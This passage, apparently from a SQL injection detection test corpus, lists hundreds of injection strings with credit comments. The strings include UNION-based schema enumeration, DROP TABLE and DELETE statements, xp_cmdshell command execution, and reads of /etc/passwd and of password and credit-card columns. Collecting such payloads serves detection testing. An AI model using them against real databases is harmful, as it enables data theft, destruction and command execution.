EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE 397 | 398 | # https://twitter.com/st1ll_di3/status/344416764949561346 399 | # http://pastebin.com/Ymcs7nE0 400 | (--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- - 401 | 402 | # example from http://www.websec.ca/kb/sql_injection 403 | 1=1 AND-+-+-+-+~~((1)) 404 | 405 | # the bizarre sp_password hackery 406 | 1-- foo sp_password 407 | 1'--sp_password 408 | 409 | # nice ms-access, courtesy mod-security 410 | foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a 411 | 412 | # mysql and pgsql string litterals 413 | b'1' UNION SELECT 1 414 | x'1' UNION SELECT 1 415 | n'1' UNION SELECT 1 416 | 417 | # ending clauses 418 | 1 having 1 limit 1 union select 1-- 419 | 1 having (1) limit 1 union select 1-- 420 | 1 having -(1) limit 1 union select 1-- 421 | 1 having sin(1) limit 1 union select 1-- 422 | 1 having 1 limit 2 group by 3 union select 1-- 423 | 1 group by 2 union select 1 -- 424 | sin(1) group by 1 union select 1-- 425 | @version group by 1 union select 1-- 426 | @version group by (-1) union select 1-- 427 | (@version) group by -1 union select 1-- 428 | (@version) group by (-1) union select 1-- 429 | (@version)) group by (-1) union select 1-- 430 | (1)) group by (-1) union select 1-- 431 | (@version) group by sin(-1) union select 1-- 432 | 1 group by sin(1) union select 1-- 433 | 1 group by 1 - sin(1) union select 1-- 434 | 1 group by (sin(1)) union select 1-- 435 | -1 group by -(-sin(1)) union select 1-- 436 | sin(1) group by (-sin(1)) union select 1-- 437 | sin(1)-1 group by (-sin(1)) union select 1-- 438 | sin(1)-1 group by 1 union select 1-- 439 | 1 group by ((1)) union select 1-- 440 | 1 group by (((1))) union select 1-- 441 | ((1)) group by (1) union select 1-- 442 | (1) group by ((1)) union select 1-- 443 | (1) group by (1) union select 1-- 444 | 445 | # more with 'having' 446 | -(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1 447 | -(1) is not unknown UNION select table_name from information_schema.tables limit 1 448 | -(1) is not unknown for update UNION select table_name from information_schema.tables limit 1 449 | -(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1 450 | -(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1 451 | -(1) is not unknown UNION select table_name from information_schema.tables limit 1 452 | -(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1 453 | -(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1 454 | -(1) for update UNION select table_name from information_schema.tables limit 1 455 | 1 for update UNION select table_name from information_schema.tables limit 1 456 | 457 | -(1) for update UNION select table_name from information_schema.tables limit 1 458 | -(true) for update UNION select table_name from information_schema.tables limit 1 459 | -(null) for update UNION select table_name from information_schema.tables limit 1 460 | -(\N) for update UNION select table_name from information_schema.tables limit 1 461 | -(\N) for update having true UNION select table_name from information_schema.tables limit 1 462 | -(\N) for update having 1 UNION select table_name from information_schema.tables limit 1 463 | -(1) for update having 1 UNION select table_name from information_schema.tables limit 1 464 | -(1) having 1 for updateUNION select table_name from information_schema.tables limit 1 465 | -(1) having 1 for update UNION select table_name from information_schema.tables limit 1 466 | -(1) having 1 for update UNION select table_name from information_schema.tables limit 1 467 | 468 | \''; DROP TABLE users; -- 469 | \''); DROP TABLE users; -- 470 | \''; /* one */ ;DROP TABLE users; -- 471 | \''; select 1; drop table users; -- 472 | 1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck 473 | 1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ; 474 | 1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck 475 | 1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck 476 | 477 | EXEC sp_add_job @job_name = 'TestJob'; 478 | EXECUTE sp_add_job @job_name = 'TestJob'; 479 | 1;EXECUTE sp_add_job @job_name = 'TestJob'; 480 | 1;print 'foo'; exec xp_cmdshell 'destroy'; 481 | 482 | # nested sub-selects 483 | -1 - (select (1 - select (select 1))) union all select 2 -- 484 | -1 - (select 1) - union all select 2 -- 485 | (select 1) - 1 union all select 2 -- 486 | ((select 1) - 1) + (select 1) union all select 2 -- 487 | (select (select (select 1))) union all select 2 -- 488 | (select (select (select 1))) union all select 2 -- 489 | (select ((select (select 1))) union all select 2 -- 490 | (select (select ((select 1))) union all select 2 -- 491 | (select ((select 1 - (select 1))) union all select 2 -- 492 | (select (select (((select 1))) union all select 2 -- 493 | (select ((select (select 1))) union all select 2 -- 494 | (select (((select (select 1))) union all select 2 -- 495 | (select (select (1 - select 1))) union all select 2 -- 496 | (select (select 1 - (select 1))) union all select 2 -- 497 | (select 1 - (select 1 - (select 1))) union all select 2 -- 498 | 499 | # moar unions 500 | -1 union distinct select table_name from information_schema.tables 501 | -1 union distinct all select table_name from information_schema.tables 502 | -1 union all distinct select table_name from information_schema.tables 503 | -1 union all select table_name from information_schema.tables 504 | 505 | # more 506 | if(1, -1, 2) union select table_name from information_schema.tables limit 1 507 | if((1), -1, 2) union select table_name from information_schema.tables limit 1 508 | if(1=2, -1, 2) union select table_name from information_schema.tables limit 1 509 | true in(2, (select 2)) union select table_name from information_schema.tables limit 1 510 | true in(2, 1) union select table_name from information_schema.tables limit 1 511 | 512 | # 513 | -1 union select current_user``union select table_name from information_schema.tables 514 | 515 | if(1, 1, 2) union select 3 516 | if(sin(1), 1, 2) union select 3 517 | if(1, sin(1), 2) union select 3 518 | if(1 - sin(1), 2) union select 3 519 | if((1), 1, 2) union select 3 520 | if(-(1), 1, 2) union select 3 521 | 522 | # 523 | 1; if exists ( /* anything */ 524 | 525 | # these aren't SQL but close enough 526 | union (select 1)-- 527 | union all (select 1)-- 528 | union all (select distinct 1)-- 529 | union (select 1,2,3,4,5)-- 530 | union (select -1,2,3,4,5)-- 531 | union (select -(1),2,3,4,5)-- 532 | union (select -sin(1),2,3,4,5)-- 533 | 1;call p(@version, @a) 534 | 1;load data infile "foo" 535 | 1;load xml infile "foo" 536 | 1;load xml local infile "foo" 537 | 1;load xml low_priority infile "foo" 538 | 1;load xml concurrent infile "foo" 539 | 1; delete from foo 540 | 1; delete low_priority from foo 541 | 1; delete quick from foo 542 | 1; delete ignore from foo 543 | 544 | 545 | 1;do (1=1) 546 | 547 | -0b01 for update union select table_name from information_schema.tables limit 1 548 | binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables 549 | binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables 550 | 12 union select table_name from information_schema.tables limit 1 551 | binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1 552 | 553 | binary (false) union select table_name from information_schema.tables limit 1 554 | 1 - binary (false) union select table_name from information_schema.tables limit 1 555 | 1 - (binary (false)) union select table_name from information_schema.tables limit 1 556 | binary binary 1 union select table_name from information_schema.tables 557 | binary -1 union select table_name from information_schema.tables 558 | binary -(1) union select table_name from information_schema.tables 559 | binary (binary 1) union select table_name from information_schema.tables 560 | binary (binary 1) union select table_name from information_schema.tables 561 | 562 | # werid slash escaping in Older T-SQL databases 563 | # http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR 564 | \1=\1AND\1=\1; 565 | 566 | # more weird T-SQL weirdness 567 | \%250=\-1AND\*1=\/1 568 | 569 | # mysql 570 | -1 procedure analyse() union select table_name from information_schema.tables limit 1 571 | 572 | # HT @FluxReiners 573 | (1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- - 574 | @a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- - 575 | 576 | # HT @LightOS 577 | # issue here is how '1gfsdg..' is processed. 578 | # MySQL parses it as a single word, other databases treat it as "1", "gfs..." 579 | -1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1 580 | 581 | # HT @FluxReiners 582 | (select 1 foo) union select load_file('foo'); 583 | 584 | # 585 | # Anonymous from Research Institution of Telecom in Beijing, China 586 | # commenting out since i have no idea how this could be a true SQL injection 587 | #=1 union select admin,pass from admin limit 1 588 | #=1 union select 1,2,3,4,5,6 589 | 590 | # problems with type-casting, and nested type casting 591 | # 592 | # credit: Reto Ischi 593 | # 594 | 's' || binary(1)# and n='foo" 595 | 1 - binary (1 - binary(1)) UNION SELECT 2 -- 596 | 1 - binary (binary(1) -1) UNION SELECT 2 -- 597 | binary (1 - binary(1)) UNION SELECT 2 -- 598 | binary (binary(1) - 1) UNION SELECT 2 -- 599 | binary (binary(1)) UNION SELECT 2 -- 600 | 601 | # 602 | # Padding using between operator 603 | # 604 | (1 between @version and "2") & 1 UNION SELECT 1 605 | (1 between @version and @user) & 1 UNION SELECT 1 606 | (1 between 1 and @version) & 1 UNION SELECT 1 607 | (1 between '1' and @version) & 1 UNION SELECT 1 608 | (1 between 1 and 2) & 1 UNION SELECT 1 609 | (1 between '1' and '2') & 1 UNION SELECT 1 610 | (1 between 1 and '2') & 1 UNION SELECT 1 611 | (1 between '1' and 2) & 1 UNION SELECT 1 612 | ('1' between '1' and '2') & 1 UNION SELECT 1 613 | (@version between '1' and '2') & 1 UNION SELECT 1 614 | (@version between 1 and '2') & 1 UNION SELECT 1 615 | 616 | # 617 | # ANY and SOME subqueries 618 | # 619 | 1 - ANY(SELECT 1,2) 620 | ANY(SELECT 1) - 1 UNION ALL -- 621 | ANY(SELECT (1)) - 1 UNION ALL -- 622 | ANY((SELECT 1)) - 1 UNION ALL -- 623 | 1 - ANY(SELECT 1) UNION ALL -- 624 | 625 | # 626 | # embedded %A0 mysql 627 | # 628 | 1%A0UNION%A0SELECT%A02-- 629 | 1%00UNION%00SELECT%002-- 630 | 631 | # 632 | # http://www.exploit-db.com/exploits/28854/ 633 | # 634 | stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1 635 | 636 | # 637 | # Thanks to @rsalgado 638 | # A degenerate MySQL ODBC case 639 | # 640 | -{``.``.id} union select table_name FROM information_schema.tables LIMIT 1 641 | --------------------------------------------------------------------------------